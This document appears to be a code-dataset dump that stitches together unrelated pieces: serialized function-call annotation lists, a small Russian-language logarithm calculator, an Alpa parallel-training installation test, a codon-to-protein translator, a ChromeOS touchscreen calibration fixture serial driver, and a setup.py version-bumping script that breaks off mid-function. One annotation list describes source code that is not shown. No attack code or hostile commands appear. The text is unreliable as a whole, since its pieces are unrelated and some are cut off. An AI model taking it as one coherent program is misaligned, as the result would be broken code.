[((14644, 14658), 'numpy.fft.rfft', 'np.fft.rfft', (['y'], {}), '(y)\n', (14655, 14658), True, 'import numpy as np\n'), ((14872, 14888), 'numpy.arccos', 'np.arccos', (['first'], {}), '(first)\n', (14881, 14888), True, 'import numpy as np\n'), ((14994, 15023), 'scipy.optimize.curve_fit', 'curve_fit', (['_func', 'x', 'y'], {'p0': 'p0'}), '(_func, x, y, p0=p0)\n', (15003, 15023), False, 'from scipy.optimize import curve_fit\n'), ((17298, 17327), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'rabi_n'], {}), '(0.0, 1.0, rabi_n)\n', (17309, 17327), True, 'import numpy as np\n'), ((7958, 7982), 'presto.utils.get_sourcecode', 'get_sourcecode', (['__file__'], {}), '(__file__)\n', (7972, 7982), False, 'from presto.utils import get_sourcecode, sin2\n'), ((11440, 11468), 'numpy.arange', 'np.arange', (['idx_low', 'idx_high'], {}), '(idx_low, idx_high)\n', (11449, 11468), True, 'import numpy as np\n'), ((12128, 12171), 'numpy.mean', 'np.mean', (['self.store_arr[:, 0, idx]'], {'axis': '(-1)'}), '(self.store_arr[:, 0, idx], axis=-1)\n', (12135, 12171), True, 'import numpy as np\n'), ((12187, 12207), 'presto.utils.rotate_opt', 'rotate_opt', (['resp_arr'], {}), '(resp_arr)\n', (12197, 12207), False, 'from presto.utils import rotate_opt\n'), ((13742, 13773), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'tight_layout': '(True)'}), '(tight_layout=True)\n', (13754, 13773), True, 'import matplotlib.pyplot as plt\n'), ((14463, 14472), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (14469, 14472), True, 'import numpy as np\n'), ((14475, 14484), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14481, 14484), True, 'import numpy as np\n'), ((14498, 14507), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14504, 14507), True, 'import numpy as np\n'), ((15079, 15092), 'numpy.diag', 'np.diag', (['pcov'], {}), '(pcov)\n', (15086, 15092), True, 'import numpy as np\n'), ((1850, 2153), 'presto.pulsed.Pulsed', 'pulsed.Pulsed', ([], {'address': 'presto_address', 'port': 'presto_port', 'ext_ref_clk': 'ext_ref_clk', 'adc_mode': 'AdcMode.Mixed', 'adc_fsample': 'AdcFSample.G2', 'dac_mode': '[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02]', 'dac_fsample': '[DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6]'}), '(address=presto_address, port=presto_port, ext_ref_clk=\n ext_ref_clk, adc_mode=AdcMode.Mixed, adc_fsample=AdcFSample.G2,\n dac_mode=[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.\n Mixed02], dac_fsample=[DacFSample.G10, DacFSample.G6, DacFSample.G6,\n DacFSample.G6])\n', (1863, 2153), False, 'from presto import pulsed\n'), ((5171, 5187), 'presto.utils.sin2', 'sin2', (['control_ns'], {}), '(control_ns)\n', (5175, 5187), False, 'from presto.utils import get_sourcecode, sin2\n'), ((7358, 7384), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7374, 7384), False, 'import os\n'), ((7459, 7485), 'os.path.split', 'os.path.split', (['script_path'], {}), '(script_path)\n', (7472, 7485), False, 'import os\n'), ((7790, 7838), 'os.path.join', 'os.path.join', (['current_dir', '"""data"""', 'save_basename'], {}), "(current_dir, 'data', save_basename)\n", (7802, 7838), False, 'import os\n'), ((7903, 7934), 'os.path.realpath', 'os.path.realpath', (['save_filename'], {}), '(save_filename)\n', (7919, 7934), False, 'import os\n'), ((8059, 8084), 'h5py.File', 'h5py.File', (['save_path', '"""w"""'], {}), "(save_path, 'w')\n", (8068, 8084), False, 'import h5py\n'), ((8110, 8145), 'h5py.string_dtype', 'h5py.string_dtype', ([], {'encoding': '"""utf-8"""'}), "(encoding='utf-8')\n", (8127, 8145), False, 'import h5py\n'), ((9028, 9057), 'h5py.File', 'h5py.File', (['load_filename', '"""r"""'], {}), "(load_filename, 'r')\n", (9037, 9057), False, 'import h5py\n'), ((11340, 11366), 'numpy.abs', 'np.abs', (['(self.t_arr - t_low)'], {}), '(self.t_arr - t_low)\n', (11346, 11366), True, 'import numpy as np\n'), ((11397, 11424), 'numpy.abs', 'np.abs', (['(self.t_arr - t_high)'], {}), '(self.t_arr - t_high)\n', (11403, 11424), True, 'import numpy as np\n'), ((11613, 11663), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(1)'], {'sharex': '(True)', 'tight_layout': '(True)'}), '(2, 1, sharex=True, tight_layout=True)\n', (11625, 11663), True, 'import matplotlib.pyplot as plt\n'), ((12287, 12300), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (12294, 12300), True, 'import numpy as np\n'), ((12706, 12776), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(4)', '(1)'], {'sharex': '(True)', 'figsize': '(6.4, 6.4)', 'tight_layout': '(True)'}), '(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)\n', (12718, 12776), True, 'import matplotlib.pyplot as plt\n'), ((14234, 14274), 'numpy.cos', 'np.cos', (['(math.tau * frequency * t + phase)'], {}), '(math.tau * frequency * t + phase)\n', (14240, 14274), True, 'import numpy as np\n'), ((14562, 14571), 'numpy.max', 'np.max', (['x'], {}), '(x)\n', (14568, 14571), True, 'import numpy as np\n'), ((14574, 14583), 'numpy.min', 'np.min', (['x'], {}), '(x)\n', (14580, 14583), True, 'import numpy as np\n'), ((3169, 3243), 'mla_server.set_dc_bias', 'set_dc_bias', (["self.jpa_params['jpa_bias_port']", "self.jpa_params['jpa_bias']"], {}), "(self.jpa_params['jpa_bias_port'], self.jpa_params['jpa_bias'])\n", (3180, 3243), False, 'from mla_server import set_dc_bias\n'), ((3260, 3275), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (3270, 3275), False, 'import time\n'), ((6996, 7046), 'mla_server.set_dc_bias', 'set_dc_bias', (["self.jpa_params['jpa_bias_port']", '(0.0)'], {}), "(self.jpa_params['jpa_bias_port'], 0.0)\n", (7007, 7046), False, 'from mla_server import set_dc_bias\n'), ((7516, 7549), 'os.path.splitext', 'os.path.splitext', (['script_basename'], {}), '(script_basename)\n', (7532, 7549), False, 'import os\n'), ((7634, 7650), 'time.localtime', 'time.localtime', ([], {}), '()\n', (7648, 7650), False, 'import time\n'), ((10298, 10339), 'ast.literal_eval', 'ast.literal_eval', (["h5f.attrs['jpa_params']"], {}), "(h5f.attrs['jpa_params'])\n", (10314, 10339), False, 'import ast\n'), ((11879, 11910), 'numpy.abs', 'np.abs', (['self.store_arr[0, 0, :]'], {}), '(self.store_arr[0, 0, :])\n', (11885, 11910), True, 'import numpy as np\n'), ((11952, 11985), 'numpy.angle', 'np.angle', (['self.store_arr[0, 0, :]'], {}), '(self.store_arr[0, 0, :])\n', (11960, 11985), True, 'import numpy as np\n'), ((12862, 12874), 'numpy.abs', 'np.abs', (['data'], {}), '(data)\n', (12868, 12874), True, 'import numpy as np\n'), ((12920, 12934), 'numpy.angle', 'np.angle', (['data'], {}), '(data)\n', (12928, 12934), True, 'import numpy as np\n'), ((12980, 12993), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (12987, 12993), True, 'import numpy as np\n'), ((13127, 13140), 'numpy.imag', 'np.imag', (['data'], {}), '(data)\n', (13134, 13140), True, 'import numpy as np\n'), ((13440, 13452), 'numpy.abs', 'np.abs', (['data'], {}), '(data)\n', (13446, 13452), True, 'import numpy as np\n'), ((13820, 13833), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (13827, 13833), True, 'import numpy as np\n'), ((14216, 14231), 'numpy.exp', 'np.exp', (['(-t / T2)'], {}), '(-t / T2)\n', (14222, 14231), True, 'import numpy as np\n'), ((14695, 14710), 'numpy.abs', 'np.abs', (['fft[1:]'], {}), '(fft[1:])\n', (14701, 14710), True, 'import numpy as np\n'), ((8683, 8720), 'numpy.isscalar', 'np.isscalar', (['self.__dict__[attribute]'], {}), '(self.__dict__[attribute])\n', (8694, 8720), True, 'import numpy as np\n')]
|
import math
print('Вас приветствует логарифмер.')
print('Выберите тип (1 - Двоичный, 2 - Стандартный десятичный)')
a = int(input())
b = float(input('Введите число: '))
if a == 1 :
print(math.log(b, 2))
elif a == 2 :
print(math.log(b))
else:
print('Ошибка!')
|
[
"math.log"
] |
[((196, 210), 'math.log', 'math.log', (['b', '(2)'], {}), '(b, 2)\n', (204, 210), False, 'import math\n'), ((238, 249), 'math.log', 'math.log', (['b'], {}), '(b)\n', (246, 249), False, 'import math\n')]
|
"""Some basic tests to test installation."""
import os
import unittest
from flax import linen as nn
from flax.training.train_state import TrainState
import jax
import jax.numpy as jnp
import numpy as np
import optax
import ray
from alpa import (init, parallelize, grad, ShardParallel,
automatic_layer_construction, PipeshardParallel)
from alpa.device_mesh import get_global_cluster
from alpa.testing import assert_allclose
def create_train_state_and_batch(batch_size, hidden_size):
class Model(nn.Module):
@nn.compact
def __call__(self, x):
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
return x
rngkey = jax.random.PRNGKey(0)
batch = {
"x":
jax.random.normal(rngkey, (batch_size, hidden_size),
dtype=jnp.float32),
"y":
jax.random.normal(rngkey, (batch_size, hidden_size),
dtype=jnp.float32)
}
# Init model and optimizer
model = Model()
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, batch["x"])
tx = optax.sgd(learning_rate=1e-3)
state = TrainState.create(apply_fn=model.apply, params=params, tx=tx)
return state, batch
class InstallationTest(unittest.TestCase):
def setUp(self):
os.environ["XLA_PYTHON_CLIENT_ALLOCATOR"] = "platform"
def test_1_shard_parallel(self):
state, batch = create_train_state_and_batch(256, 256)
def train_step(state, batch):
def loss_func(params):
out = state.apply_fn(params, batch['x'])
return jnp.mean((out - batch['y'])**2)
grads = grad(loss_func)(state.params)
new_state = state.apply_gradients(grads=grads)
return new_state
# Serial execution
expected_state = train_step(state, batch)
# Parallel execution
p_train_step = parallelize(train_step,
method=ShardParallel(num_micro_batches=2))
actual_state = p_train_step(state, batch)
# Check results
assert_allclose(expected_state.params, actual_state.params)
def test_2_pipeline_parallel(self):
init(cluster="ray")
layer_num = min(get_global_cluster().num_devices, 2)
state, batch = create_train_state_and_batch(256, 256)
def train_step(state, batch):
@automatic_layer_construction(layer_num=layer_num)
def loss_func(params):
out = state.apply_fn(params, batch['x'])
return jnp.mean((out - batch['y'])**2)
grads = grad(loss_func)(state.params)
new_state = state.apply_gradients(grads=grads)
return new_state
# Serial execution
expected_state = train_step(state, batch)
# Parallel execution
p_train_step = parallelize(
train_step, method=PipeshardParallel(num_micro_batches=2))
actual_state = p_train_step(state, batch)
# Check results
assert_allclose(expected_state.params, actual_state.params)
def suite():
suite = unittest.TestSuite()
suite.addTest(InstallationTest("test_1_shard_parallel"))
suite.addTest(InstallationTest("test_2_pipeline_parallel"))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"unittest.TextTestRunner",
"unittest.TestSuite",
"jax.random.normal",
"flax.linen.Dense",
"alpa.ShardParallel",
"flax.training.train_state.TrainState.create",
"alpa.automatic_layer_construction",
"jax.random.PRNGKey",
"alpa.grad",
"alpa.init",
"optax.sgd",
"alpa.testing.assert_allclose",
"alpa.device_mesh.get_global_cluster",
"alpa.PipeshardParallel",
"jax.numpy.mean"
] |
[((956, 977), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (974, 977), False, 'import jax\n'), ((1318, 1339), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (1336, 1339), False, 'import jax\n'), ((1393, 1423), 'optax.sgd', 'optax.sgd', ([], {'learning_rate': '(0.001)'}), '(learning_rate=0.001)\n', (1402, 1423), False, 'import optax\n'), ((1435, 1496), 'flax.training.train_state.TrainState.create', 'TrainState.create', ([], {'apply_fn': 'model.apply', 'params': 'params', 'tx': 'tx'}), '(apply_fn=model.apply, params=params, tx=tx)\n', (1452, 1496), False, 'from flax.training.train_state import TrainState\n'), ((3421, 3441), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (3439, 3441), False, 'import unittest\n'), ((3626, 3651), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (3649, 3651), False, 'import unittest\n'), ((1017, 1088), 'jax.random.normal', 'jax.random.normal', (['rngkey', '(batch_size, hidden_size)'], {'dtype': 'jnp.float32'}), '(rngkey, (batch_size, hidden_size), dtype=jnp.float32)\n', (1034, 1088), False, 'import jax\n'), ((1145, 1216), 'jax.random.normal', 'jax.random.normal', (['rngkey', '(batch_size, hidden_size)'], {'dtype': 'jnp.float32'}), '(rngkey, (batch_size, hidden_size), dtype=jnp.float32)\n', (1162, 1216), False, 'import jax\n'), ((2394, 2453), 'alpa.testing.assert_allclose', 'assert_allclose', (['expected_state.params', 'actual_state.params'], {}), '(expected_state.params, actual_state.params)\n', (2409, 2453), False, 'from alpa.testing import assert_allclose\n'), ((2503, 2522), 'alpa.init', 'init', ([], {'cluster': '"""ray"""'}), "(cluster='ray')\n", (2507, 2522), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((3334, 3393), 'alpa.testing.assert_allclose', 'assert_allclose', (['expected_state.params', 'actual_state.params'], {}), '(expected_state.params, actual_state.params)\n', (3349, 3393), False, 'from alpa.testing import assert_allclose\n'), ((2700, 2749), 'alpa.automatic_layer_construction', 'automatic_layer_construction', ([], {'layer_num': 'layer_num'}), '(layer_num=layer_num)\n', (2728, 2749), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((601, 637), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (609, 637), True, 'from flax import linen as nn\n'), ((657, 693), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (665, 693), True, 'from flax import linen as nn\n'), ((713, 749), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (721, 749), True, 'from flax import linen as nn\n'), ((769, 805), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (777, 805), True, 'from flax import linen as nn\n'), ((825, 861), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (833, 861), True, 'from flax import linen as nn\n'), ((881, 917), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (889, 917), True, 'from flax import linen as nn\n'), ((1907, 1940), 'jax.numpy.mean', 'jnp.mean', (["((out - batch['y']) ** 2)"], {}), "((out - batch['y']) ** 2)\n", (1915, 1940), True, 'import jax.numpy as jnp\n'), ((1960, 1975), 'alpa.grad', 'grad', (['loss_func'], {}), '(loss_func)\n', (1964, 1975), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((2275, 2309), 'alpa.ShardParallel', 'ShardParallel', ([], {'num_micro_batches': '(2)'}), '(num_micro_batches=2)\n', (2288, 2309), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((2548, 2568), 'alpa.device_mesh.get_global_cluster', 'get_global_cluster', ([], {}), '()\n', (2566, 2568), False, 'from alpa.device_mesh import get_global_cluster\n'), ((2865, 2898), 'jax.numpy.mean', 'jnp.mean', (["((out - batch['y']) ** 2)"], {}), "((out - batch['y']) ** 2)\n", (2873, 2898), True, 'import jax.numpy as jnp\n'), ((2918, 2933), 'alpa.grad', 'grad', (['loss_func'], {}), '(loss_func)\n', (2922, 2933), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((3211, 3249), 'alpa.PipeshardParallel', 'PipeshardParallel', ([], {'num_micro_batches': '(2)'}), '(num_micro_batches=2)\n', (3228, 3249), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n')]
|
from textwrap import wrap
def proteins(strand):
# textwrap.wrap(s, i) creates a list of elements from s with a max width of i
codons = wrap(strand, 3)
codons_to_protein = {
'AUG': 'Methionine',
'UUU': 'Phenylalanine',
'UUC': 'Phenylalanine',
'UUA': 'Leucine',
'UUG': 'Leucine',
'UCU': 'Serine',
'UCC': 'Serine',
'UCA': 'Serine',
'UCG': 'Serine',
'UAU': 'Tyrosine',
'UAC': 'Tyrosine',
'UGU': 'Cysteine',
'UGC': 'Cysteine',
'UGG': 'Tryptophan',
'UAA': 'STOP',
'UAG': 'STOP',
'UGA': 'STOP'
}
RNA = []
for i in codons:
if codons_to_protein[i] == 'STOP':
break
else:
RNA.append(codons_to_protein[i])
return RNA
|
[
"textwrap.wrap"
] |
[((149, 164), 'textwrap.wrap', 'wrap', (['strand', '(3)'], {}), '(strand, 3)\n', (153, 164), False, 'from textwrap import wrap\n')]
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import threading
import time
from cros.factory.test import event
from cros.factory.test.i18n import _
from cros.factory.test import session
from cros.factory.test.utils import serial_utils
# Define the driver name and the interface protocols to find the arduino ports.
# NATIVE_USB_PORT: used to monitor the internal state of test fixture.
# PROGRAMMING_PORT: used to upload the firmware from host to the arduino and
# issue calibration commands to control the test fixture.
NATIVE_USB_PORT = 0
PROGRAMMING_PORT = 1
ARDUINO_DRIVER = 'cdc_acm'
interface_protocol_dict = {NATIVE_USB_PORT: '00', PROGRAMMING_PORT: '01'}
ArduinoCommand = collections.namedtuple(
'ArduinoCommand', ['DOWN', 'UP', 'STATE', 'RESET'])
COMMAND = ArduinoCommand('d', 'u', 's', 'r')
ArduinoState = collections.namedtuple(
'ArduinoState', ['INIT', 'STOP_DOWN', 'STOP_UP', 'GOING_DOWN', 'GOING_UP',
'EMERGENCY_STOP'])
STATE = ArduinoState('i', 'D', 'U', 'd', 'u', 'e')
class FixtureException(Exception):
"""A dummy exception class for FixtureSerialDevice."""
class FixutreNativeUSB(serial_utils.SerialDevice):
"""A native usb port used to monitor the internal state of the fixture."""
def __init__(self, driver=ARDUINO_DRIVER,
interface_protocol=interface_protocol_dict[NATIVE_USB_PORT],
timeout=86400):
super(FixutreNativeUSB, self).__init__()
self.driver = driver
self.interface_protocol = interface_protocol
self.timeout = timeout
self.port = self._GetPort()
self._Connect(self.port)
self.state_string = None
self.last_state_string = None
# The ordering of the state names should match that in
# touchscreen_calibration.ino
self.state_name_dict = [
'state',
'jumper',
'button debug',
'sensor extreme up',
'sensor up',
'sensor down',
'sensor safety',
'motor direction',
'motor enabled',
'motor locked',
'motor duty cycle',
'pwm frequency',
'count',
]
def _GetPort(self):
return serial_utils.FindTtyByDriver(self.driver, self.interface_protocol)
def _Connect(self, port):
try:
self.Connect(port=port, timeout=self.timeout)
msg = 'Connect to native USB port "%s" for monitoring internal state.'
session.console.info(msg, port)
except Exception:
msg = 'FixtureNativeUSB: failed to connect to native usb port: %s'
session.console.warn(msg, port)
def _CheckReconnection(self):
"""Reconnect the native usb port if it has been refreshed."""
curr_port = self._GetPort()
if curr_port != self.port:
self.Disconnect()
self._Connect(curr_port)
self.port = curr_port
session.console.info('Reconnect to new port: %s', curr_port)
def GetState(self):
"""Get the fixture state from the native usb port.
The complete state_string looks like: <i1001000000.6000.0>
Its format is defined in self.state_name_dict in __init__() above.
The first character describes the main state.
This call is blocked until a complete fixture state has been received.
Call this method with a new thread if needed.
"""
self._CheckReconnection()
reply = []
while True:
ch = self.Receive()
reply.append(ch)
if ch == '>':
self.last_state_string = self.state_string
self.state_string = ''.join(reply)
return self.state_string
def QueryFixtureState(self):
"""Query fixture internal state."""
self._CheckReconnection()
self.Send('s')
def _ExtractStateList(self, state_string):
if state_string:
state, pwm_freq, count = state_string.strip().strip('<>').split('.')
state_list = list(state)
state_list.extend([pwm_freq, count])
else:
state_list = []
return state_list
def DiffState(self):
"""Get the difference of between this state and the last state."""
old_state_list = self._ExtractStateList(self.last_state_string)
new_state_list = self._ExtractStateList(self.state_string)
return [(self.state_name_dict[i], new_state_list[i])
for i in range(len(new_state_list))
if old_state_list == [] or new_state_list[i] != old_state_list[i]]
def CompleteState(self):
"""Get the complete state snap shot."""
state_list = self._ExtractStateList(self.state_string)
return [(self.state_name_dict[i], state_list[i])
for i in range(len(state_list))]
class BaseFixture(serial_utils.SerialDevice):
"""A base fixture class."""
def __init__(self, state=None):
super(BaseFixture, self).__init__()
self.state = state
self.native_usb = None
class FakeFixture(BaseFixture):
"""A fake fixture class used for development purpose only."""
TIMEOUT = 10
def __init__(self, ui, state=None):
super(FakeFixture, self).__init__(state)
self.ui = ui
self.final_calibration_lock = threading.Event()
def QueryState(self):
"""Queries the state of the arduino board."""
return self.state
def IsStateUp(self):
"""Checks if the fixture is in the INIT or STOP_UP state."""
return (self.state in [STATE.INIT, STATE.STOP_UP])
def IsEmergencyStop(self):
"""Checks if the fixture is in the EMERGENCY_STOP state."""
return self.state == STATE.EMERGENCY_STOP
def DriveProbeDown(self):
"""Drives the probe to the 'down' position."""
session.console.info('Drive Probe Down....')
self.ui.Alert(_('Pull the lever down.'))
def DriveProbeUp(self):
"""Drives the probe to the 'up' position."""
session.console.info('Drive Probe Up....')
self.ui.Alert(_('Pull the lever up.'))
self.final_calibration_lock.wait(self.TIMEOUT)
self.ui.PostEvent(event.Event(event.Event.Type.TEST_UI_EVENT,
subtype='FinishTest'))
def DriveProbeUpDone(self):
"""Notify that the DriveProbeUp has been done."""
self.final_calibration_lock.set()
class FixtureSerialDevice(BaseFixture):
"""A serial device to control touchscreen fixture."""
def __init__(self, driver=ARDUINO_DRIVER,
interface_protocol=interface_protocol_dict[PROGRAMMING_PORT],
timeout=20):
super(FixtureSerialDevice, self).__init__()
try:
port = serial_utils.FindTtyByDriver(driver, interface_protocol)
self.Connect(port=port, timeout=timeout)
msg = 'Connect to programming port "%s" for issuing commands.'
session.console.info(msg, port)
session.console.info('Wait up to %d seconds for arduino initialization.',
timeout)
except Exception:
raise FixtureException('Failed to connect the test fixture.')
self.AssertStateWithTimeout([STATE.INIT, STATE.STOP_UP,
STATE.EMERGENCY_STOP], timeout)
# The 2nd-generation tst fixture has a native usb port.
self.native_usb = FixutreNativeUSB()
if not self.native_usb:
raise FixtureException('Fail to connect the native usb port.')
def QueryState(self):
"""Queries the state of the arduino board."""
try:
self.state = self.SendReceive(COMMAND.STATE)
except Exception:
raise FixtureException('QueryState failed.')
return self.state
def IsStateUp(self):
"""Checks if the fixture is in the INIT or STOP_UP state."""
return (self.QueryState() in [STATE.INIT, STATE.STOP_UP])
def IsEmergencyStop(self):
"""Checks if the fixture is in the EMERGENCY_STOP state."""
return self.QueryState() == STATE.EMERGENCY_STOP
def AssertStateWithTimeout(self, expected_states, timeout):
"""Assert the state with timeout."""
while True:
result, state = self._AssertState(expected_states)
if result is True:
session.console.info('state: %s (expected)', state)
return
session.console.info('state: %s (transient, probe still moving)', state)
time.sleep(1)
timeout -= 1
if timeout == 0:
break
msg = 'AssertState failed: actual state: "%s", expected_states: "%s".'
raise FixtureException(msg % (state, str(expected_states)))
def _AssertState(self, expected_states):
"""Confirms that the arduino is in the specified state.
It returns True if the actual state is in the expected states;
otherwise, it returns the actual state.
"""
if not isinstance(expected_states, list):
expected_states = [expected_states]
actual_state = self.QueryState()
return (actual_state in expected_states, actual_state)
def AssertState(self, expected_states):
result, _ = self._AssertState(expected_states)
if result is not True:
msg = 'AssertState failed: actual state: "%s", expected_states: "%s".'
raise FixtureException(msg % (result, str(expected_states)))
def DriveProbeDown(self):
"""Drives the probe to the 'down' position."""
try:
response = self.SendReceive(COMMAND.DOWN)
session.console.info('Send COMMAND.DOWN(%s). Receive state(%s).',
COMMAND.DOWN, response)
except Exception:
raise FixtureException('DriveProbeDown failed.')
self.AssertState(STATE.STOP_DOWN)
def DriveProbeUp(self):
"""Drives the probe to the 'up' position."""
try:
response = self.SendReceive(COMMAND.UP)
session.console.info('Send COMMAND.UP(%s). Receive state(%s).',
COMMAND.UP, response)
except Exception:
raise FixtureException('DriveProbeUp failed.')
self.AssertState(STATE.STOP_UP)
|
[
"cros.factory.test.event.Event",
"cros.factory.test.i18n._",
"cros.factory.test.session.console.warn",
"time.sleep",
"cros.factory.test.session.console.info",
"threading.Event",
"collections.namedtuple",
"cros.factory.test.utils.serial_utils.FindTtyByDriver"
] |
[((843, 917), 'collections.namedtuple', 'collections.namedtuple', (['"""ArduinoCommand"""', "['DOWN', 'UP', 'STATE', 'RESET']"], {}), "('ArduinoCommand', ['DOWN', 'UP', 'STATE', 'RESET'])\n", (865, 917), False, 'import collections\n'), ((984, 1104), 'collections.namedtuple', 'collections.namedtuple', (['"""ArduinoState"""', "['INIT', 'STOP_DOWN', 'STOP_UP', 'GOING_DOWN', 'GOING_UP', 'EMERGENCY_STOP']"], {}), "('ArduinoState', ['INIT', 'STOP_DOWN', 'STOP_UP',\n 'GOING_DOWN', 'GOING_UP', 'EMERGENCY_STOP'])\n", (1006, 1104), False, 'import collections\n'), ((2291, 2357), 'cros.factory.test.utils.serial_utils.FindTtyByDriver', 'serial_utils.FindTtyByDriver', (['self.driver', 'self.interface_protocol'], {}), '(self.driver, self.interface_protocol)\n', (2319, 2357), False, 'from cros.factory.test.utils import serial_utils\n'), ((5143, 5160), 'threading.Event', 'threading.Event', ([], {}), '()\n', (5158, 5160), False, 'import threading\n'), ((5626, 5670), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Drive Probe Down...."""'], {}), "('Drive Probe Down....')\n", (5646, 5670), False, 'from cros.factory.test import session\n'), ((5796, 5838), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Drive Probe Up...."""'], {}), "('Drive Probe Up....')\n", (5816, 5838), False, 'from cros.factory.test import session\n'), ((2531, 2562), 'cros.factory.test.session.console.info', 'session.console.info', (['msg', 'port'], {}), '(msg, port)\n', (2551, 2562), False, 'from cros.factory.test import session\n'), ((2947, 3007), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Reconnect to new port: %s"""', 'curr_port'], {}), "('Reconnect to new port: %s', curr_port)\n", (2967, 3007), False, 'from cros.factory.test import session\n'), ((5689, 5714), 'cros.factory.test.i18n._', '_', (['"""Pull the lever down."""'], {}), "('Pull the lever down.')\n", (5690, 5714), False, 'from cros.factory.test.i18n import _\n'), ((5857, 5880), 'cros.factory.test.i18n._', '_', (['"""Pull the lever up."""'], {}), "('Pull the lever up.')\n", (5858, 5880), False, 'from cros.factory.test.i18n import _\n'), ((5955, 6020), 'cros.factory.test.event.Event', 'event.Event', (['event.Event.Type.TEST_UI_EVENT'], {'subtype': '"""FinishTest"""'}), "(event.Event.Type.TEST_UI_EVENT, subtype='FinishTest')\n", (5966, 6020), False, 'from cros.factory.test import event\n'), ((6497, 6553), 'cros.factory.test.utils.serial_utils.FindTtyByDriver', 'serial_utils.FindTtyByDriver', (['driver', 'interface_protocol'], {}), '(driver, interface_protocol)\n', (6525, 6553), False, 'from cros.factory.test.utils import serial_utils\n'), ((6676, 6707), 'cros.factory.test.session.console.info', 'session.console.info', (['msg', 'port'], {}), '(msg, port)\n', (6696, 6707), False, 'from cros.factory.test import session\n'), ((6714, 6800), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Wait up to %d seconds for arduino initialization."""', 'timeout'], {}), "('Wait up to %d seconds for arduino initialization.',\n timeout)\n", (6734, 6800), False, 'from cros.factory.test import session\n'), ((8051, 8123), 'cros.factory.test.session.console.info', 'session.console.info', (['"""state: %s (transient, probe still moving)"""', 'state'], {}), "('state: %s (transient, probe still moving)', state)\n", (8071, 8123), False, 'from cros.factory.test import session\n'), ((8130, 8143), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (8140, 8143), False, 'import time\n'), ((9156, 9250), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Send COMMAND.DOWN(%s). Receive state(%s)."""', 'COMMAND.DOWN', 'response'], {}), "('Send COMMAND.DOWN(%s). Receive state(%s).', COMMAND.\n DOWN, response)\n", (9176, 9250), False, 'from cros.factory.test import session\n'), ((9526, 9615), 'cros.factory.test.session.console.info', 'session.console.info', (['"""Send COMMAND.UP(%s). Receive state(%s)."""', 'COMMAND.UP', 'response'], {}), "('Send COMMAND.UP(%s). Receive state(%s).', COMMAND.UP,\n response)\n", (9546, 9615), False, 'from cros.factory.test import session\n'), ((2664, 2695), 'cros.factory.test.session.console.warn', 'session.console.warn', (['msg', 'port'], {}), '(msg, port)\n', (2684, 2695), False, 'from cros.factory.test import session\n'), ((7978, 8029), 'cros.factory.test.session.console.info', 'session.console.info', (['"""state: %s (expected)"""', 'state'], {}), "('state: %s (expected)', state)\n", (7998, 8029), False, 'from cros.factory.test import session\n')]
|
#!/usr/bin/env python3
import subprocess
import argparse
def increment_setup_version():
filename = 'setup.py'
# Read file
fd = open(filename, 'r')
line_arr = fd.readlines()
fd.close()
# Search for the specific line
count = 0
version = None
version_line = None
for i in range(0, len(line_arr)):
line = line_arr[i]
count += 1
# print("line{}: {}".format(count, line))
pattern0 = "version=\"0.0."
pattern1 = "\","
if pattern0 in line:
print("[find_version] line {}: {}".format(count, line))
version = line
